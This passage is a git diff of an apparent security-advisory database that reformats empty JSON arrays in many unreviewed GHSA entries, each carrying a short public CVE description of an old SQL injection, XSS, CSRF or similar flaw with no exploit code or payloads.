@@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9r92-jm28-mfmj/GHSA-9r92-jm28-mfmj.json b/advisories/unreviewed/2022/05/GHSA-9r92-jm28-mfmj/GHSA-9r92-jm28-mfmj.json index 0f41e102bc2..4bd8f7be715 100644 --- a/advisories/unreviewed/2022/05/GHSA-9r92-jm28-mfmj/GHSA-9r92-jm28-mfmj.json +++ b/advisories/unreviewed/2022/05/GHSA-9r92-jm28-mfmj/GHSA-9r92-jm28-mfmj.json @@ -7,12 +7,8 @@ "CVE-2012-3741" ], "details": "The Restrictions (aka Parental Controls) implementation in Apple iOS before 6 does not properly handle purchase attempts after a Disable Restrictions action, which allows local users to bypass an intended Apple ID authentication step via an app that performs purchase transactions.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9rch-5m7j-5mjm/GHSA-9rch-5m7j-5mjm.json b/advisories/unreviewed/2022/05/GHSA-9rch-5m7j-5mjm/GHSA-9rch-5m7j-5mjm.json index 4d582e77605..ba15a75e2f7 100644 --- a/advisories/unreviewed/2022/05/GHSA-9rch-5m7j-5mjm/GHSA-9rch-5m7j-5mjm.json +++ b/advisories/unreviewed/2022/05/GHSA-9rch-5m7j-5mjm/GHSA-9rch-5m7j-5mjm.json @@ -7,12 +7,8 @@ "CVE-2012-3533" ], "details": "The python SDK before 3.1.0.6 and CLI before 3.1.0.8 for oVirt 3.1 does not check the server SSL certificate against the client keys, which allows remote attackers to spoof a server via a man-in-the-middle (MITM) attack.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9rmc-rhrc-35vg/GHSA-9rmc-rhrc-35vg.json b/advisories/unreviewed/2022/05/GHSA-9rmc-rhrc-35vg/GHSA-9rmc-rhrc-35vg.json index c80b141249b..1c2c1c5b1f1 100644 --- a/advisories/unreviewed/2022/05/GHSA-9rmc-rhrc-35vg/GHSA-9rmc-rhrc-35vg.json +++ b/advisories/unreviewed/2022/05/GHSA-9rmc-rhrc-35vg/GHSA-9rmc-rhrc-35vg.json @@ -7,12 +7,8 @@ "CVE-2011-5137" ], "details": "Multiple SQL injection vulnerabilities in tForum b0.915 allow remote attackers to execute arbitrary SQL commands via the (1) TopicID parameter to viewtopic.php, the (2) BoardID parameter to viewboard.php, or (3) CatID parameter to viewcat.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9w8f-qg8v-8c68/GHSA-9w8f-qg8v-8c68.json b/advisories/unreviewed/2022/05/GHSA-9w8f-qg8v-8c68/GHSA-9w8f-qg8v-8c68.json index eee1a67aca3..203d2ec3364 100644 --- a/advisories/unreviewed/2022/05/GHSA-9w8f-qg8v-8c68/GHSA-9w8f-qg8v-8c68.json +++ b/advisories/unreviewed/2022/05/GHSA-9w8f-qg8v-8c68/GHSA-9w8f-qg8v-8c68.json @@ -7,12 +7,8 @@ "CVE-2012-0872" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in OxWall 1.1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) captchaField, (2) email, (3) form_name, (4) password, (5) realname, (6) repeatPassword, or (7) username parameters to Oxwall/join; (8) captcha, (9) email, (10) form_name, (11) from, or (12) subject parameters to Oxwall/contact; (13) tag parameter to Oxwall/blogs/browse-by-tag; or (14) PATH_INFO to Oxwall/photo/viewlist/tagged, (15) Oxwall/photo/viewlist, or (16) Oxwall/video/viewlist.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9wq5-j862-j69v/GHSA-9wq5-j862-j69v.json b/advisories/unreviewed/2022/05/GHSA-9wq5-j862-j69v/GHSA-9wq5-j862-j69v.json index 29f705279b8..17e33f291f7 100644 --- a/advisories/unreviewed/2022/05/GHSA-9wq5-j862-j69v/GHSA-9wq5-j862-j69v.json +++ b/advisories/unreviewed/2022/05/GHSA-9wq5-j862-j69v/GHSA-9wq5-j862-j69v.json @@ -7,12 +7,8 @@ "CVE-2012-4059" ], "details": "Cross-site request forgery (CSRF) vulnerability in home/secretqtn.php in SocketMail Pro 2.2.9 allows remote attackers to hijack the authentication of arbitrary users for requests that change user security questions and answers via an upd action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9x78-4wr4-f2jj/GHSA-9x78-4wr4-f2jj.json b/advisories/unreviewed/2022/05/GHSA-9x78-4wr4-f2jj/GHSA-9x78-4wr4-f2jj.json index 9592d88aef4..21b5fe84a97 100644 --- a/advisories/unreviewed/2022/05/GHSA-9x78-4wr4-f2jj/GHSA-9x78-4wr4-f2jj.json +++ b/advisories/unreviewed/2022/05/GHSA-9x78-4wr4-f2jj/GHSA-9x78-4wr4-f2jj.json @@ -7,12 +7,8 @@ "CVE-2012-1649" ], "details": "Cool Aid module before 6.x-1.9 for Drupal does not enforce access restrictions, which allows remote authenticated users with the administer coolaid permission to modify arbitrary pages via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9x8g-w8r7-7p9c/GHSA-9x8g-w8r7-7p9c.json b/advisories/unreviewed/2022/05/GHSA-9x8g-w8r7-7p9c/GHSA-9x8g-w8r7-7p9c.json index 6b926420914..a5ce276f063 100644 --- a/advisories/unreviewed/2022/05/GHSA-9x8g-w8r7-7p9c/GHSA-9x8g-w8r7-7p9c.json +++ b/advisories/unreviewed/2022/05/GHSA-9x8g-w8r7-7p9c/GHSA-9x8g-w8r7-7p9c.json @@ -7,12 +7,8 @@ "CVE-2012-2411" ], "details": "Buffer overflow in RealNetworks RealPlayer before 15.0.4.53, and RealPlayer SP 1.0 through 1.1.5, allows remote attackers to execute arbitrary code via a crafted RealJukebox Media file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c2v8-h6rh-cf9h/GHSA-c2v8-h6rh-cf9h.json b/advisories/unreviewed/2022/05/GHSA-c2v8-h6rh-cf9h/GHSA-c2v8-h6rh-cf9h.json index 675e1b364f8..fdcf04b9a77 100644 --- a/advisories/unreviewed/2022/05/GHSA-c2v8-h6rh-cf9h/GHSA-c2v8-h6rh-cf9h.json +++ b/advisories/unreviewed/2022/05/GHSA-c2v8-h6rh-cf9h/GHSA-c2v8-h6rh-cf9h.json @@ -7,12 +7,8 @@ "CVE-2012-0948" ], "details": "DistUpgrade/DistUpgradeMain.py in Update Manager, as used by Ubuntu 12.04 LTS, 11.10, and 11.04, uses weak permissions for (1) apt-clone_system_state.tar.gz and (2) system_state.tar.gz, which allows local users to obtain repository credentials.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-c2w8-wjm8-q9r4/GHSA-c2w8-wjm8-q9r4.json b/advisories/unreviewed/2022/05/GHSA-c2w8-wjm8-q9r4/GHSA-c2w8-wjm8-q9r4.json index 9bf40350cbe..822ec0d50cd 100644 --- a/advisories/unreviewed/2022/05/GHSA-c2w8-wjm8-q9r4/GHSA-c2w8-wjm8-q9r4.json +++ b/advisories/unreviewed/2022/05/GHSA-c2w8-wjm8-q9r4/GHSA-c2w8-wjm8-q9r4.json @@ -7,12 +7,8 @@ "CVE-2012-2577" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in SolarWinds Orion Network Performance Monitor (NPM) before 10.3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) syslocation, (2) syscontact, or (3) sysName field of an snmpd.conf file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c3cp-wmgh-g889/GHSA-c3cp-wmgh-g889.json b/advisories/unreviewed/2022/05/GHSA-c3cp-wmgh-g889/GHSA-c3cp-wmgh-g889.json index 022bd20e2b6..3a9bf5c5eb7 100644 --- a/advisories/unreviewed/2022/05/GHSA-c3cp-wmgh-g889/GHSA-c3cp-wmgh-g889.json +++ b/advisories/unreviewed/2022/05/GHSA-c3cp-wmgh-g889/GHSA-c3cp-wmgh-g889.json @@ -7,12 +7,8 @@ "CVE-2011-5220" ], "details": "Cross-site scripting (XSS) vulnerability in templates/default/Admin/Login.html in PHP-SCMS 1.6.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the lang parameter to index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c3vm-p8x5-j8qp/GHSA-c3vm-p8x5-j8qp.json b/advisories/unreviewed/2022/05/GHSA-c3vm-p8x5-j8qp/GHSA-c3vm-p8x5-j8qp.json index 56f58793f02..41b970e4f41 100644 --- a/advisories/unreviewed/2022/05/GHSA-c3vm-p8x5-j8qp/GHSA-c3vm-p8x5-j8qp.json +++ b/advisories/unreviewed/2022/05/GHSA-c3vm-p8x5-j8qp/GHSA-c3vm-p8x5-j8qp.json @@ -7,12 +7,8 @@ "CVE-2012-3538" ], "details": "Pulp in Red Hat CloudForms before 1.1 logs administrative passwords in a world-readable file, which allows local users to read pulp administrative passwords by reading production.log.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-c3w7-4c4j-v6c9/GHSA-c3w7-4c4j-v6c9.json b/advisories/unreviewed/2022/05/GHSA-c3w7-4c4j-v6c9/GHSA-c3w7-4c4j-v6c9.json index 3d803099521..829428f41ff 100644 --- a/advisories/unreviewed/2022/05/GHSA-c3w7-4c4j-v6c9/GHSA-c3w7-4c4j-v6c9.json +++ b/advisories/unreviewed/2022/05/GHSA-c3w7-4c4j-v6c9/GHSA-c3w7-4c4j-v6c9.json @@ -7,12 +7,8 @@ "CVE-2012-0986" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in ImpressCMS 1.2.x before 1.2.7 Final and 1.3.x before 1.3.1 Final allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) notifications.php, (2) modules/system/admin/images/browser.php, and (3) modules/content/admin/content.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c4fx-hc5m-2fq7/GHSA-c4fx-hc5m-2fq7.json b/advisories/unreviewed/2022/05/GHSA-c4fx-hc5m-2fq7/GHSA-c4fx-hc5m-2fq7.json index 862cfdb43bb..93c3db0870d 100644 --- a/advisories/unreviewed/2022/05/GHSA-c4fx-hc5m-2fq7/GHSA-c4fx-hc5m-2fq7.json +++ b/advisories/unreviewed/2022/05/GHSA-c4fx-hc5m-2fq7/GHSA-c4fx-hc5m-2fq7.json @@ -7,12 +7,8 @@ "CVE-2012-2905" ], "details": "Artiphp CMS 5.5.0 Neo (r422) stores database backups with predictable names under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-c53q-p5wq-m9g6/GHSA-c53q-p5wq-m9g6.json b/advisories/unreviewed/2022/05/GHSA-c53q-p5wq-m9g6/GHSA-c53q-p5wq-m9g6.json index 4923d7e852f..605e95a7c57 100644 --- a/advisories/unreviewed/2022/05/GHSA-c53q-p5wq-m9g6/GHSA-c53q-p5wq-m9g6.json +++ b/advisories/unreviewed/2022/05/GHSA-c53q-p5wq-m9g6/GHSA-c53q-p5wq-m9g6.json @@ -7,12 +7,8 @@ "CVE-2012-2721" ], "details": "The default views in the Organic Groups (OG) module 6.x-2.x before 6.x-2.4 for Drupal do not properly check permissions when all users have the \"access content\" permission removed, which allows remote attackers to bypass access restrictions and possibly have other unspecified impact.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-c638-pq9h-7jf5/GHSA-c638-pq9h-7jf5.json b/advisories/unreviewed/2022/05/GHSA-c638-pq9h-7jf5/GHSA-c638-pq9h-7jf5.json index 39483093723..3af586faa45 100644 --- a/advisories/unreviewed/2022/05/GHSA-c638-pq9h-7jf5/GHSA-c638-pq9h-7jf5.json +++ b/advisories/unreviewed/2022/05/GHSA-c638-pq9h-7jf5/GHSA-c638-pq9h-7jf5.json @@ -7,12 +7,8 @@ "CVE-2011-4643" ], "details": "Multiple directory traversal vulnerabilities in Splunk 4.x before 4.2.5 allow remote authenticated users to read arbitrary files via a .. (dot dot) in a URI to (1) Splunk Web or (2) the Splunkd HTTP Server, aka SPL-45243.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c6fp-j53m-qjjq/GHSA-c6fp-j53m-qjjq.json b/advisories/unreviewed/2022/05/GHSA-c6fp-j53m-qjjq/GHSA-c6fp-j53m-qjjq.json index d6b3fc6095c..5907dd8a51d 100644 --- a/advisories/unreviewed/2022/05/GHSA-c6fp-j53m-qjjq/GHSA-c6fp-j53m-qjjq.json +++ b/advisories/unreviewed/2022/05/GHSA-c6fp-j53m-qjjq/GHSA-c6fp-j53m-qjjq.json @@ -7,12 +7,8 @@ "CVE-2012-1644" ], "details": "The Organic Groups (OG) Vocabulary module 6.x-1.x before 6.x-1.2 for Drupal allows remote authenticated users with certain administrator permissions to modify the vocabularies of other groups via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-c83c-43x9-qm39/GHSA-c83c-43x9-qm39.json b/advisories/unreviewed/2022/05/GHSA-c83c-43x9-qm39/GHSA-c83c-43x9-qm39.json index 105b90d7673..4cd6a3f56cc 100644 --- a/advisories/unreviewed/2022/05/GHSA-c83c-43x9-qm39/GHSA-c83c-43x9-qm39.json +++ b/advisories/unreviewed/2022/05/GHSA-c83c-43x9-qm39/GHSA-c83c-43x9-qm39.json @@ -7,12 +7,8 @@ "CVE-2012-2940" ], "details": "MediaChance Real-DRAW PRO 5.2.4 allows remote attackers to cause a denial of service (application crash) via a crafted (1) PNG, (2) WMF, (3) PSD, (4) TGA, (5) TTF, (6) BMP, (7) TIFF, or (8) PCX file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c84h-w3jx-4m39/GHSA-c84h-w3jx-4m39.json b/advisories/unreviewed/2022/05/GHSA-c84h-w3jx-4m39/GHSA-c84h-w3jx-4m39.json index b667b1c18a8..a811435e786 100644 --- a/advisories/unreviewed/2022/05/GHSA-c84h-w3jx-4m39/GHSA-c84h-w3jx-4m39.json +++ b/advisories/unreviewed/2022/05/GHSA-c84h-w3jx-4m39/GHSA-c84h-w3jx-4m39.json @@ -7,12 +7,8 @@ "CVE-2011-5230" ], "details": "Multiple SQL injection vulnerabilities in the selectUserIdByLoginPass function in seotoaster_core/application/models/LoginModel.php in Seotoaster 1.9 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) login parameter to sys/login/index or (2) memberLoginName parameter to sys/login/member.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c88c-rr5r-3prm/GHSA-c88c-rr5r-3prm.json b/advisories/unreviewed/2022/05/GHSA-c88c-rr5r-3prm/GHSA-c88c-rr5r-3prm.json index 9fd3f0a0870..26357e92445 100644 --- a/advisories/unreviewed/2022/05/GHSA-c88c-rr5r-3prm/GHSA-c88c-rr5r-3prm.json +++ b/advisories/unreviewed/2022/05/GHSA-c88c-rr5r-3prm/GHSA-c88c-rr5r-3prm.json @@ -7,12 +7,8 @@ "CVE-2012-2956" ], "details": "SQL injection vulnerability in SpiceWorks 5.3.75941 allows remote authenticated users to execute arbitrary SQL commands via the id parameter to api_v2.json. NOTE: this entry was SPLIT per ADT2 due to different vulnerability types. CVE-2012-6658 is for the XSS.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c895-43rw-5x9c/GHSA-c895-43rw-5x9c.json b/advisories/unreviewed/2022/05/GHSA-c895-43rw-5x9c/GHSA-c895-43rw-5x9c.json index 000dab299ca..47ad5d4455b 100644 --- a/advisories/unreviewed/2022/05/GHSA-c895-43rw-5x9c/GHSA-c895-43rw-5x9c.json +++ b/advisories/unreviewed/2022/05/GHSA-c895-43rw-5x9c/GHSA-c895-43rw-5x9c.json @@ -7,12 +7,8 @@ "CVE-2012-2025" ], "details": "Adobe Illustrator before CS6 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-0780, CVE-2012-2023, CVE-2012-2024, and CVE-2012-2026.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c8g7-4m44-qm2x/GHSA-c8g7-4m44-qm2x.json b/advisories/unreviewed/2022/05/GHSA-c8g7-4m44-qm2x/GHSA-c8g7-4m44-qm2x.json index d23695b046e..be0904dc032 100644 --- a/advisories/unreviewed/2022/05/GHSA-c8g7-4m44-qm2x/GHSA-c8g7-4m44-qm2x.json +++ b/advisories/unreviewed/2022/05/GHSA-c8g7-4m44-qm2x/GHSA-c8g7-4m44-qm2x.json @@ -7,12 +7,8 @@ "CVE-2011-5205" ], "details": "Cross-site scripting (XSS) vulnerability in audl.php in Rapidleech 2.3 rev42 SVN r358, rev43 SVN r397, and earlier allows remote attackers to inject arbitrary web script or HTML via the links parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c94m-78w3-8ggr/GHSA-c94m-78w3-8ggr.json b/advisories/unreviewed/2022/05/GHSA-c94m-78w3-8ggr/GHSA-c94m-78w3-8ggr.json index a1fc4f051c9..cf46b278579 100644 --- a/advisories/unreviewed/2022/05/GHSA-c94m-78w3-8ggr/GHSA-c94m-78w3-8ggr.json +++ b/advisories/unreviewed/2022/05/GHSA-c94m-78w3-8ggr/GHSA-c94m-78w3-8ggr.json @@ -7,12 +7,8 @@ "CVE-2012-0960" ], "details": "Unity integration extension (unity-firefox-extension) before 2.4.1 for Firefox does not properly handle callbacks, which allows remote attackers to cause a denial of service (Firefox crash) and possibly execute arbitrary code via a crafted request.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c9hc-hmvj-rv94/GHSA-c9hc-hmvj-rv94.json b/advisories/unreviewed/2022/05/GHSA-c9hc-hmvj-rv94/GHSA-c9hc-hmvj-rv94.json index 31b6facf084..ba9f6b6265a 100644 --- a/advisories/unreviewed/2022/05/GHSA-c9hc-hmvj-rv94/GHSA-c9hc-hmvj-rv94.json +++ b/advisories/unreviewed/2022/05/GHSA-c9hc-hmvj-rv94/GHSA-c9hc-hmvj-rv94.json @@ -7,12 +7,8 @@ "CVE-2012-2173" ], "details": "The ODBC driver in IBM Security AppScan Source 7.x and 8.x before 8.6 sends an SHA-1 hash of the connection password during connections to a solidDB database, which allows remote attackers to obtain sensitive information by sniffing the network.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cccm-x8mq-7j9r/GHSA-cccm-x8mq-7j9r.json b/advisories/unreviewed/2022/05/GHSA-cccm-x8mq-7j9r/GHSA-cccm-x8mq-7j9r.json index 9601cb6c586..8aa504bef81 100644 --- a/advisories/unreviewed/2022/05/GHSA-cccm-x8mq-7j9r/GHSA-cccm-x8mq-7j9r.json +++ b/advisories/unreviewed/2022/05/GHSA-cccm-x8mq-7j9r/GHSA-cccm-x8mq-7j9r.json @@ -7,12 +7,8 @@ "CVE-2012-2923" ], "details": "SQL injection vulnerability in news.php4 in Hypermethod eLearning Server 4G allows remote attackers to execute arbitrary SQL commands via the nid parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-ccf9-j4gr-f8jc/GHSA-ccf9-j4gr-f8jc.json b/advisories/unreviewed/2022/05/GHSA-ccf9-j4gr-f8jc/GHSA-ccf9-j4gr-f8jc.json index f49dc66250b..b0d6a95aaa4 100644 --- a/advisories/unreviewed/2022/05/GHSA-ccf9-j4gr-f8jc/GHSA-ccf9-j4gr-f8jc.json +++ b/advisories/unreviewed/2022/05/GHSA-ccf9-j4gr-f8jc/GHSA-ccf9-j4gr-f8jc.json @@ -7,12 +7,8 @@ "CVE-2011-4822" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the user profile feature in Atlassian FishEye before 2.5.5 allow remote attackers to inject arbitrary web script or HTML via (1) snippets in a user comment, which is not properly handled in a Confluence page, or (2) the user profile display name, which is not properly handled in a FishEye page.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cf3q-fj9g-rpgj/GHSA-cf3q-fj9g-rpgj.json b/advisories/unreviewed/2022/05/GHSA-cf3q-fj9g-rpgj/GHSA-cf3q-fj9g-rpgj.json index 6075539cb8c..d3a9aeba373 100644 --- a/advisories/unreviewed/2022/05/GHSA-cf3q-fj9g-rpgj/GHSA-cf3q-fj9g-rpgj.json +++ b/advisories/unreviewed/2022/05/GHSA-cf3q-fj9g-rpgj/GHSA-cf3q-fj9g-rpgj.json @@ -7,12 +7,8 @@ "CVE-2011-5200" ], "details": "Multiple SQL injection vulnerabilities in DeDeCMS, possibly 5.6, allow remote attackers to execute arbitrary SQL commands via the id parameter to (1) list.php, (2) members.php, or (3) book.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cf6q-8992-3xv4/GHSA-cf6q-8992-3xv4.json b/advisories/unreviewed/2022/05/GHSA-cf6q-8992-3xv4/GHSA-cf6q-8992-3xv4.json index 83b479db917..13679ac42f8 100644 --- a/advisories/unreviewed/2022/05/GHSA-cf6q-8992-3xv4/GHSA-cf6q-8992-3xv4.json +++ b/advisories/unreviewed/2022/05/GHSA-cf6q-8992-3xv4/GHSA-cf6q-8992-3xv4.json @@ -7,12 +7,8 @@ "CVE-2012-3141" ], "details": "Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking component in Oracle Financial Services Software 10.0.0, 10.0.2, 10.1.0, 10.2.0, 10.2.2, 10.3.0, 10.5.0, and 11.0.0 through 11.2.0 allows remote authenticated users to affect integrity, related to BASE, a different vulnerability than CVE-2012-3227.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cfhv-72p9-r3f9/GHSA-cfhv-72p9-r3f9.json b/advisories/unreviewed/2022/05/GHSA-cfhv-72p9-r3f9/GHSA-cfhv-72p9-r3f9.json index c98a3f1e579..003afee896d 100644 --- a/advisories/unreviewed/2022/05/GHSA-cfhv-72p9-r3f9/GHSA-cfhv-72p9-r3f9.json +++ b/advisories/unreviewed/2022/05/GHSA-cfhv-72p9-r3f9/GHSA-cfhv-72p9-r3f9.json @@ -7,12 +7,8 @@ "CVE-2012-1048" ], "details": "Cross-site scripting (XSS) vulnerability in communityplusplus/www/administrator.php in eFront Community++ edition 3.6.10, and possibly other editions, allows remote attackers to inject arbitrary web script or HTML via the filter parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cg8w-5vgp-3c2r/GHSA-cg8w-5vgp-3c2r.json b/advisories/unreviewed/2022/05/GHSA-cg8w-5vgp-3c2r/GHSA-cg8w-5vgp-3c2r.json index 536d6fb7c58..9a506bdf93e 100644 --- a/advisories/unreviewed/2022/05/GHSA-cg8w-5vgp-3c2r/GHSA-cg8w-5vgp-3c2r.json +++ b/advisories/unreviewed/2022/05/GHSA-cg8w-5vgp-3c2r/GHSA-cg8w-5vgp-3c2r.json @@ -7,12 +7,8 @@ "CVE-2012-2722" ], "details": "The node selection interface in the WYSIWYG editor (CKEditor) in the Node Embed module 6.x-1.x before 6.x-1.5 and 7.x-1.x before 7.x-1.0 for Drupal does not properly check permissions, which allows remote attackers to bypass intended access restrictions and read node titles.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cgpm-fxg7-f9wc/GHSA-cgpm-fxg7-f9wc.json b/advisories/unreviewed/2022/05/GHSA-cgpm-fxg7-f9wc/GHSA-cgpm-fxg7-f9wc.json index 6176363ddc7..27fe4945f5e 100644 --- a/advisories/unreviewed/2022/05/GHSA-cgpm-fxg7-f9wc/GHSA-cgpm-fxg7-f9wc.json +++ b/advisories/unreviewed/2022/05/GHSA-cgpm-fxg7-f9wc/GHSA-cgpm-fxg7-f9wc.json @@ -7,12 +7,8 @@ "CVE-2012-3322" ], "details": "Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 6.2 through 7.5, Maximo Asset Management Essentials 6.2 through 7.5, Tivoli Asset Management for IT 6.2 through 7.2, Tivoli Service Request Manager 7.1 and 7.2, Maximo Service Desk 6.2, Change and Configuration Management Database (CCMDB) 7.1 and 7.2, and SmartCloud Control Desk 7.5 allows remote authenticated users to inject arbitrary web script or HTML via vectors related to a display name.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cgw2-cwh6-c7wv/GHSA-cgw2-cwh6-c7wv.json b/advisories/unreviewed/2022/05/GHSA-cgw2-cwh6-c7wv/GHSA-cgw2-cwh6-c7wv.json index bbc3968e069..0646019721f 100644 --- a/advisories/unreviewed/2022/05/GHSA-cgw2-cwh6-c7wv/GHSA-cgw2-cwh6-c7wv.json +++ b/advisories/unreviewed/2022/05/GHSA-cgw2-cwh6-c7wv/GHSA-cgw2-cwh6-c7wv.json @@ -7,12 +7,8 @@ "CVE-2012-3575" ], "details": "Unrestricted file upload vulnerability in uploader.php in the RBX Gallery plugin 2.1 for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in uploads/rbxslider.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-chcm-cfp6-rx55/GHSA-chcm-cfp6-rx55.json b/advisories/unreviewed/2022/05/GHSA-chcm-cfp6-rx55/GHSA-chcm-cfp6-rx55.json index 0159478492d..2b62562275f 100644 --- a/advisories/unreviewed/2022/05/GHSA-chcm-cfp6-rx55/GHSA-chcm-cfp6-rx55.json +++ 